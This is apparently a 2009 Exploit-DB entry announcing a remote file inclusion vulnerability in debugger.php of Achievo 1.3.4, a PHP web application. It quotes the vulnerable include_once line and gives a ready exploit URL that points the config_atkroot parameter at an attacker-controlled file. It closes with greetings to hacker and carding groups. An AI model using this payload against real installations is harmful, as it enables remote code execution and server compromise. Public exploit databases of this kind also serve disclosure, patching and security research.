Achievo 1.3.4 - Remote File Inclusion

EDB-ID:

9839


Author:

M3NW5

Type:

webapps


Platform:

PHP

Date:

2009-09-22


#############################################################
Achievo 1.3.4(debugger.php) Remote File Include Vulnerability
#############################################################
Author	 : M3NW5
Homepage : http://www.indonesiancoder.com
contach  : m3nw5@hackermail.com
Location : INDONESIA
#############################################################
Achievo 1.3.4 Information
#############################################################
Vendor	 : http://www.achievo.org/
Scripts  : http://www.achievo.org/download/
File	 : debugger.php
	   include_once($config_atkroot."atk/include/initial.inc");
Exploit	 : http://target.com/path/debugger.php?config_atkroot=<deviL>
#############################################################
thenqyu	 : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9
	   Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint
	   gonzhack.cyb3r_tr0n.m364tr0n.
	   YogyaCarderLink.v3n0m
#############################################################